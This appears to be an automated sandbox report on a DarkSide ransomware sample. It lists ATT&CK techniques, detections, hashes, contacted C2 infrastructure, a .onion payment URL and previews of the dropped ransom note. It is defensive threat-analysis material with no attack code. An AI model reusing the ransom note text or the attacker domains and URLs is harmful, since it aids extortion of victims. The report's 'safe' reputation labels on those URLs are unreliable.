
Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Windows Service1	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Defacement1
Default Accounts	Service Execution1	Boot or Logon Initialization Scripts	Windows Service1	Obfuscated Files or Information1	LSASS Memory	System Service Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell1	Logon Script (Windows)	Process Injection11	File Deletion1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	System Information Discovery14	Distributed Component Object Model	Input Capture	Scheduled Transfer	Proxy1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion21	LSA Secrets	Security Software Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection11	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
rUUR0qQI22.exe	93%	ReversingLabs	Win32.Ransomware.DarkSide
rUUR0qQI22.exe	100%	Avira	TR/Crypt.XPACK.Gen
rUUR0qQI22.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.rUUR0qQI22.exe.ce0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
0.2.rUUR0qQI22.exe.ce0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT	0%	Avira URL Cloud	safe
https://securebestapp20.com/jVPuJOnhRSBlO	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://securebestapp20.com/jVPuJOnhRSBl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
securebestapp20.com	185.105.109.19	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000006.00000002.282581454.000001658117D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT	README.418990b0.TXT.0.dr	true	Avira URL Cloud: safe	unknown
https://securebestapp20.com/jVPuJOnhRSBlO	rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://torproject.org/	README.418990b0.TXT.0.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.279994844.0000016580001000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp	false		high
https://securebestapp20.com/jVPuJOnhRSBl	rUUR0qQI22.exe, 00000000.00000002.431464752.0000000003855000.00000004.00000001.sdmp, rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.105.109.19	securebestapp20.com	Russian Federation		210079	EUROBYTEEurobyteLLCMoscowRussiaRU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	401962
Start date:	01.05.2021
Start time:	05:59:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	rUUR0qQI22 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spyw.evad.winEXE@6/10@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 94.4%) Quality average: 80.9% Quality standard deviation: 27.3%
HCA Information:	Successful, ratio: 52% Number of executed functions: 54 Number of non-executed functions: 42
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.193.48, 93.184.220.29, 23.218.209.198, 92.122.145.220, 40.88.32.150, 52.255.188.83, 23.218.208.56, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): 224.2.168.192.in-addr.arpa, 164.2.168.192.in-addr.arpa, 155.2.168.192.in-addr.arpa, 53.2.168.192.in-addr.arpa, 215.2.168.192.in-addr.arpa, 35.2.168.192.in-addr.arpa, 189.2.168.192.in-addr.arpa, 9.2.168.192.in-addr.arpa, 233.2.168.192.in-addr.arpa, 105.2.168.192.in-addr.arpa, 62.2.168.192.in-addr.arpa, 249.2.168.192.in-addr.arpa, 26.2.168.192.in-addr.arpa, 2.2.168.192.in-addr.arpa, 139.2.168.192.in-addr.arpa, dual-a-0001.a-msedge.net, 180.2.168.192.in-addr.arpa, 19.2.168.192.in-addr.arpa, 112.2.168.192.in-addr.arpa, 130.2.168.192.in-addr.arpa, skypedataprdcolcus15.cloudapp.net, 80.2.168.192.in-addr.arpa, 96.2.168.192.in-addr.arpa, 208.2.168.192.in-addr.arpa, 146.2.168.192.in-addr.arpa, 173.2.168.192.in-addr.arpa, 69.2.168.192.in-addr.arpa, 196.2.168.192.in-addr.arpa, 242.2.168.192.in-addr.arpa, 123.2.168.192.in-addr.arpa, 162.2.168.192.in-addr.arpa, 141.2.168.192.in-addr.arpa, 201.2.168.192.in-addr.arpa, 187.2.168.192.in-addr.arpa, 238.2.168.192.in-addr.arpa, 55.2.168.192.in-addr.arpa, 60.2.168.192.in-addr.arpa, 153.2.168.192.in-addr.arpa, 191.2.168.192.in-addr.arpa, 28.2.168.192.in-addr.arpa, arc.trafficmanager.net, 226.2.168.192.in-addr.arpa, 103.2.168.192.in-addr.arpa, 247.2.168.192.in-addr.arpa, 4.2.168.192.in-addr.arpa, 137.2.168.192.in-addr.arpa, 10.2.168.192.in-addr.arpa, 114.2.168.192.in-addr.arpa, 251.2.168.192.in-addr.arpa, 17.2.168.192.in-addr.arpa, 33.2.168.192.in-addr.arpa, 78.2.168.192.in-addr.arpa, 94.2.168.192.in-addr.arpa, 71.2.168.192.in-addr.arpa, 213.2.168.192.in-addr.arpa, 21.2.168.192.in-addr.arpa, 148.2.168.192.in-addr.arpa, 175.2.168.192.in-addr.arpa, 125.2.168.192.in-addr.arpa, 240.2.168.192.in-addr.arpa, 67.2.168.192.in-addr.arpa, 44.2.168.192.in-addr.arpa, 82.2.168.192.in-addr.arpa, 198.2.168.192.in-addr.arpa, 219.2.168.192.in-addr.arpa, 91.2.168.192.in-addr.arpa, arc.msn.com.nsatc.net, 159.2.168.192.in-addr.arpa, 32.2.168.192.in-addr.arpa, 236.2.168.192.in-addr.arpa, 185.2.168.192.in-addr.arpa, 74.2.168.192.in-addr.arpa, 39.2.168.192.in-addr.arpa, 254.2.168.192.in-addr.arpa, 168.2.168.192.in-addr.arpa, ocsp.digicert.com, 212.2.168.192.in-addr.arpa, 83.2.168.192.in-addr.arpa, 89.2.168.192.in-addr.arpa, 109.2.168.192.in-addr.arpa, watson.telemetry.microsoft.com, 41.2.168.192.in-addr.arpa, 228.2.168.192.in-addr.arpa, 245.2.168.192.in-addr.arpa, 100.2.168.192.in-addr.arpa, 116.2.168.192.in-addr.arpa, 50.2.168.192.in-addr.arpa, 142.2.168.192.in-addr.arpa, 177.2.168.192.in-addr.arpa, 204.2.168.192.in-addr.arpa, 161.2.168.192.in-addr.arpa, 230.2.168.192.in-addr.arpa, 135.2.168.192.in-addr.arpa, 57.2.168.192.in-addr.arpa, 127.2.168.192.in-addr.arpa, 15.2.168.192.in-addr.arpa, 192.2.168.192.in-addr.arpa, 150.2.168.192.in-addr.arpa, store-images.s-microsoft.com, 6.2.168.192.in-addr.arpa, 46.2.168.192.in-addr.arpa, 65.2.168.192.in-addr.arpa, 183.2.168.192.in-addr.arpa, 243.2.168.192.in-addr.arpa, 30.2.168.192.in-addr.arpa, 157.2.168.192.in-addr.arpa, 217.2.168.192.in-addr.arpa, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, 37.2.168.192.in-addr.arpa, 111.2.168.192.in-addr.arpa, 76.2.168.192.in-addr.arpa, 107.2.168.192.in-addr.arpa, 166.2.168.192.in-addr.arpa, 170.2.168.192.in-addr.arpa, 210.2.168.192.in-addr.arpa, img-prod-cms-rt-microsoft-com.akamaized.net, 85.2.168.192.in-addr.arpa, 120.2.168.192.in-addr.arpa, 24.2.168.192.in-addr.arpa, 87.2.168.192.in-addr.arpa, 118.2.168.192.in-addr.arpa, 179.2.168.192.in-addr.arpa, 221.2.168.192.in-addr.arpa, 52.2.168.192.in-addr.arpa, 59.2.168.192.in-addr.arpa, 133.2.168.192.in-addr.arpa, skypedataprdcoleus17.cloudapp.net, 194.2.168.192.in-addr.arpa, 232.2.168.192.in-addr.arpa, a-0001.a-afdentry.net.trafficmanager.net, 13.2.168.192.in-addr.arpa, 98.2.168.192.in-addr.arpa, 129.2.168.192.in-addr.arpa, 144.2.168.192.in-addr.arpa, 206.2.168.192.in-addr.arpa, e16646.dscg.akamaiedge.net, 8.2.168.192.in-addr.arpa, 48.2.168.192.in-addr.arpa, 63.2.168.192.in-addr.arpa, 70.2.168.192.in-addr.arpa, 86.2.168.192.in-addr.arpa, 181.2.168.192.in-addr.arpa, 138.2.168.192.in-addr.arpa, 11.2.168.192.in-addr.arpa, 1.2.168.192.in-addr.arpa, 250.2.168.192.in-addr.arpa, 18.2.168.192.in-addr.arpa, fs-wildcard.microsoft.com.edgekey.net, 113.2.168.192.in-addr.arpa, skypedataprdcoleus15.cloudapp.net, 20.2.168.192.in-addr.arpa, 95.2.168.192.in-addr.arpa, 207.2.168.192.in-addr.arpa, 147.2.168.192.in-addr.arpa, 172.2.168.192.in-addr.arpa, 68.2.168.192.in-addr.arpa, 241.2.168.192.in-addr.arpa, 122.2.168.192.in-addr.arpa, 197.2.168.192.in-addr.arpa, www.bing.com, 223.2.168.192.in-addr.arpa, 45.2.168.192.in-addr.arpa, 200.2.168.192.in-addr.arpa, ris-prod.trafficmanager.net, 165.2.168.192.in-addr.arpa, 216.2.168.192.in-addr.arpa, storeedgefd.dsx.mp.microsoft.com.edgekey.net, 54.2.168.192.in-addr.arpa, 239.2.168.192.in-addr.arpa, 131.2.168.192.in-addr.arpa, ris.api.iris.microsoft.com, 77.2.168.192.in-addr.arpa, 188.2.168.192.in-addr.arpa, 234.2.168.192.in-addr.arpa, 34.2.168.192.in-addr.arpa, 154.2.168.192.in-addr.arpa, 27.2.168.192.in-addr.arpa, 61.2.168.192.in-addr.arpa, 104.2.168.192.in-addr.arpa, 199.2.168.192.in-addr.arpa, 136.2.168.192.in-addr.arpa, 93.2.168.192.in-addr.arpa, 79.2.168.192.in-addr.arpa, storeedgefd.xbetservices.akadns.net, 115.2.168.192.in-addr.arpa, 252.2.168.192.in-addr.arpa, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, 72.2.168.192.in-addr.arpa, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, 209.2.168.192.in-addr.arpa, 16.2.168.192.in-addr.arpa, 174.2.168.192.in-addr.arpa, 214.2.168.192.in-addr.arpa, 149.2.168.192.in-addr.arpa, 124.2.168.192.in-addr.arpa, 22.2.168.192.in-addr.arpa, 43.2.168.192.in-addr.arpa, prod.fs.microsoft.com.akadns.net, 81.2.168.192.in-addr.arpa, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, 163.2.168.192.in-addr.arpa, 202.2.168.192.in-addr.arpa, 237.2.168.192.in-addr.arpa, 186.2.168.192.in-addr.arpa, 152.2.168.192.in-addr.arpa, 190.2.168.192.in-addr.arpa, 225.2.168.192.in-addr.arpa, 102.2.168.192.in-addr.arpa, 140.2.168.192.in-addr.arpa, 29.2.168.192.in-addr.arpa, displaycatalog-rp.md.mp.microsoft.com.akadns.net, 248.2.168.192.in-addr.arpa, 117.2.168.192.in-addr.arpa, cs9.wac.phicdn.net, 23.2.168.192.in-addr.arpa, 5.2.168.192.in-addr.arpa, 143.2.168.192.in-addr.arpa, 160.2.168.192.in-addr.arpa, 203.2.168.192.in-addr.arpa, 134.2.168.192.in-addr.arpa, 110.2.168.192.in-addr.arpa, 56.2.168.192.in-addr.arpa, 14.2.168.192.in-addr.arpa, 151.2.168.192.in-addr.arpa, 126.2.168.192.in-addr.arpa, 193.2.168.192.in-addr.arpa, 99.2.168.192.in-addr.arpa, www-bing-com.dual-a-0001.a-msedge.net, 220.2.168.192.in-addr.arpa, 176.2.168.192.in-addr.arpa, 47.2.168.192.in-addr.arpa, 101.2.168.192.in-addr.arpa, 66.2.168.192.in-addr.arpa, 158.2.168.192.in-addr.arpa, fs.microsoft.com, 184.2.168.192.in-addr.arpa, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, 73.2.168.192.in-addr.arpa, 38.2.168.192.in-addr.arpa, 31.2.168.192.in-addr.arpa, 92.2.168.192.in-addr.arpa, 235.2.168.192.in-addr.arpa, 253.2.168.192.in-addr.arpa, 169.2.168.192.in-addr.arpa, blobcollector.events.data.trafficmanager.net, 211.2.168.192.in-addr.arpa, 42.2.168.192.in-addr.arpa, 84.2.168.192.in-addr.arpa, 227.2.168.192.in-addr.arpa, 108.2.168.192.in-addr.arpa, 246.2.168.192.in-addr.arpa, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, 25.2.168.192.in-addr.arpa, 178.2.168.192.in-addr.arpa, 88.2.168.192.in-addr.arpa, 222.2.168.192.in-addr.arpa, 205.2.168.192.in-addr.arpa, store-images.s-microsoft.com-c.edgekey.net, 119.2.168.192.in-addr.arpa, 231.2.168.192.in-addr.arpa, 51.2.168.192.in-addr.arpa, a1449.dscg2.akamai.net, 58.2.168.192.in-addr.arpa, 97.2.168.192.in-addr.arpa, 128.2.168.192.in-addr.arpa, 132.2.168.192.in-addr.arpa, 12.2.168.192.in-addr.arpa, 145.2.168.192.in-addr.arpa, 195.2.168.192.in-addr.arpa, displaycatalog.mp.microsoft.com, 7.2.168.192.in-addr.arpa, 49.2.168.192.in-addr.arpa, 64.2.168.192.in-addr.arpa, 121.2.168.192.in-addr.arpa, 90.2.168.192.in-addr.arpa, 182.2.168.192.in-addr.arpa, 244.2.168.192.in-addr.arpa, 218.2.168.192.in-addr.arpa, 156.2.168.192.in-addr.arpa, e1723.g.akamaiedge.net, 36.2.168.192.in-addr.arpa, 75.2.168.192.in-addr.arpa, 106.2.168.192.in-addr.arpa, 229.2.168.192.in-addr.arpa, 40.2.168.192.in-addr.arpa, 167.2.168.192.in-addr.arpa, 171.2.168.192.in-addr.arpa Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/401962/sample/rUUR0qQI22.exe

Simulations

Behavior and APIs

Time	Type	Description
06:01:19	API Interceptor	28x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.105.109.19	5WIxZYV73V.exe	Get hash	malicious	Browse
	0anROWjIhR.exe	Get hash	malicious	Browse
	fast.exe	Get hash	malicious	Browse
	WVaiL4J4cc.exe	Get hash	malicious	Browse
	ULnza04Oz3.exe	Get hash	malicious	Browse
	win_encryptor.exe	Get hash	malicious	Browse
	ai.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
securebestapp20.com	5WIxZYV73V.exe	Get hash	malicious	Browse	185.105.109.19
	0anROWjIhR.exe	Get hash	malicious	Browse	185.105.109.19
	fast.exe	Get hash	malicious	Browse	185.105.109.19
	WVaiL4J4cc.exe	Get hash	malicious	Browse	185.105.109.19
	ULnza04Oz3.exe	Get hash	malicious	Browse	185.105.109.19
	win_encryptor.exe	Get hash	malicious	Browse	185.105.109.19
	ai.exe	Get hash	malicious	Browse	185.105.109.19

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
EUROBYTEEurobyteLLCMoscowRussiaRU	scan_DHL39382493.exe	Get hash	malicious	Browse	185.105.109.34
	3UiiwuZ4YR.exe	Get hash	malicious	Browse	95.142.44.135
	5WIxZYV73V.exe	Get hash	malicious	Browse	185.105.109.19
	0anROWjIhR.exe	Get hash	malicious	Browse	185.105.109.19
	fast.exe	Get hash	malicious	Browse	185.105.109.19
	kinsing2	Get hash	malicious	Browse	185.154.53.140
	kinsing	Get hash	malicious	Browse	185.154.53.140
	WVaiL4J4cc.exe	Get hash	malicious	Browse	185.105.109.19
	iEchB4J2pv.exe	Get hash	malicious	Browse	185.154.54.5
	ULnza04Oz3.exe	Get hash	malicious	Browse	185.105.109.19
	win_encryptor.exe	Get hash	malicious	Browse	185.105.109.19
	http://ukronet.ru/image/cabinet.exe	Get hash	malicious	Browse	46.30.45.120
	ai.exe	Get hash	malicious	Browse	185.105.109.19

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\README.418990b0.TXT Download File
Process:	C:\Users\user\Desktop\rUUR0qQI22.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	5.490684818423462
Encrypted:	false
SSDEEP:	48:L7EZWCOqZGgQx8N3NbS/3TXWaPdP4BuWIYiEkVRGHE:LAMCMxq3NbS/rBPdQBuGGv7
MD5:	65494EA6831E577D82FAC2B91B9C3D43
SHA1:	5C23717D22EE9B94306F2D5A2A53C60ACA03EB8C
SHA-256:	5E98B41A51606E16DDA30AD4A49457227F75D71AD2004E2942C6B8DE6202C4F3
SHA-512:	28BA13F7793AC8271AF03B26EAEBA6CBE707BF1F07FB1792818A6AB270D1C20D0091EF4A10C092F60C373AEFE09698D2B470EC6A7F8CFA47103FD8BBB8D7A7BB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.418990b0.TXT, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.418990b0.TXT, Author: Joe Security Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.418990b0.TXT, Author: Joe Security
Reputation:	low
Preview:	----------- [ Welcome to DarkSide ] -------------> .. .. What happend? .. ---------------------------------------------- .. Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. .. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. .. Follow our instructions below and you will recover all your data. .. .. What guarantees? .. ---------------------------------------------- .. We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. .. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. .. We guarantee to decrypt one file for free. Go to the site and contact us. .. .. How to get access on website? .. ---------------------------------------------- .. Using a TOR browser: .. 1) Download and i

C:\Recovery\README.418990b0.TXT Download File
Process:	C:\Users\user\Desktop\rUUR0qQI22.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	5.490684818423462
Encrypted:	false
SSDEEP:	48:L7EZWCOqZGgQx8N3NbS/3TXWaPdP4BuWIYiEkVRGHE:LAMCMxq3NbS/rBPdQBuGGv7
MD5:	65494EA6831E577D82FAC2B91B9C3D43
SHA1:	5C23717D22EE9B94306F2D5A2A53C60ACA03EB8C
SHA-256:	5E98B41A51606E16DDA30AD4A49457227F75D71AD2004E2942C6B8DE6202C4F3
SHA-512:	28BA13F7793AC8271AF03B26EAEBA6CBE707BF1F07FB1792818A6AB270D1C20D0091EF4A10C092F60C373AEFE09698D2B470EC6A7F8CFA47103FD8BBB8D7A7BB
Malicious:	false
Reputation:	low
Preview:	----------- [ Welcome to DarkSide ] -------------> .. .. What happend? .. ---------------------------------------------- .. Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. .. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. .. Follow our instructions below and you will recover all your data. .. .. What guarantees? .. ---------------------------------------------- .. We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. .. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. .. We guarantee to decrypt one file for free. Go to the site and contact us. .. .. How to get access on website? .. ---------------------------------------------- .. Using a TOR browser: .. 1) Download and i

C:\Users\README.418990b0.TXT Download File
Process:	C:\Users\user\Desktop\rUUR0qQI22.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	1969
Entropy (8bit):	5.490684818423462
Encrypted:	false
SSDEEP:	48:L7EZWCOqZGgQx8N3NbS/3TXWaPdP4BuWIYiEkVRGHE:LAMCMxq3NbS/rBPdQBuGGv7
MD5:	65494EA6831E577D82FAC2B91B9C3D43
SHA1:	5C23717D22EE9B94306F2D5A2A53C60ACA03EB8C
SHA-256:	5E98B41A51606E16DDA30AD4A49457227F75D71AD2004E2942C6B8DE6202C4F3
SHA-512:	28BA13F7793AC8271AF03B26EAEBA6CBE707BF1F07FB1792818A6AB270D1C20D0091EF4A10C092F60C373AEFE09698D2B470EC6A7F8CFA47103FD8BBB8D7A7BB
Malicious:	false
Reputation:	low
Preview:	----------- [ Welcome to DarkSide ] -------------> .. .. What happend? .. ---------------------------------------------- .. Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. .. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. .. Follow our instructions below and you will recover all your data. .. .. What guarantees? .. ---------------------------------------------- .. We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. .. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. .. We guarantee to decrypt one file for free. Go to the site and contact us. .. .. How to get access on website? .. ---------------------------------------------- .. Using a TOR browser: .. 1) Download and i

C:\Users\user\AppData\Local\418990b0.ico Download File
Process:	C:\Users\user\Desktop\rUUR0qQI22.exe
File Type:	MS Windows icon resource - 5 icons, 64x64, 32 bits/pixel, 48x48, 32 bits/pixel
Category:	dropped
Size (bytes):	34494
Entropy (8bit):	3.274622648924063
Encrypted:	false
SSDEEP:	192:gbjP3AlUfsjVX50pzKOMkbD0NY3dIZJJw:8jP3Aufsj7cOTkvIZJW
MD5:	4F57D54D01CCBDAF3EBFAC3EC0AC3FD7
SHA1:	BC529DC03674D08D64D8442C4E1D1A3E3464E953
SHA-256:	28B6841AA125225CD01BE09FBD2F1D7B3C2102D9FFC7DC8546700E67C2A6E3BC
SHA-512:	BA9F779C0066EBEC8E555276AFBC862456B083138F8EB512CAE50B431EBE32C74C0A5EFB4E99F995BCFCBAEC2B71E242984FDD5084561940E741F1CAC1D6C246
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......@@.... .(B..V...00.... ..%..~B.. .... .....&h........ ......x........ .h...V...(...@......... ......B..............................................................................................................................222.222.222.222.222.222.222.222.222.222.................................................................................................................................................................................................222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.................................................................................................................................................................222.....222.222.222.222.222.222.222.222.222 222+22222222222+222 222.222.222.222.222.222.222.222.....222.............................................................................................................................................222.222.222.222.222.222.222.222.222=222v22

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e................................................@..........

